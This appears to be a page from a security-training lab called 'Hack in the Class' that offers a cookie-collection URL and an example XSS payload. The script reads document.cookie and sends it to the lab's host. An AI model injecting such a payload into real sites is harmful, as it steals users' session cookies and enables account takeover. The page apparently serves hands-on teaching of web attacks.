Hack in the Class Cookie Monster
To feed the cookie monster, use this url:
https://cookie-monster.lab.hackintheclass.org/eat.php?monster=ab7pffql8b8i2mth7hhus2dp67&cookie=THECOOKIEYOUWANTTOGIVEExample XSS:
<script type="text/javascript"> var img = document.createElement("img"); img.src="https://cookie-monster.lab.hackintheclass.org" + "/eat.php?monster=ab7pffql8b8i2mth7hhus2dp67" + "&cookie=" + encodeURIComponent(document.cookie); document.body.appendChild(img); </script>

Your cookie monster has eaten these cookies:
No cookies yet.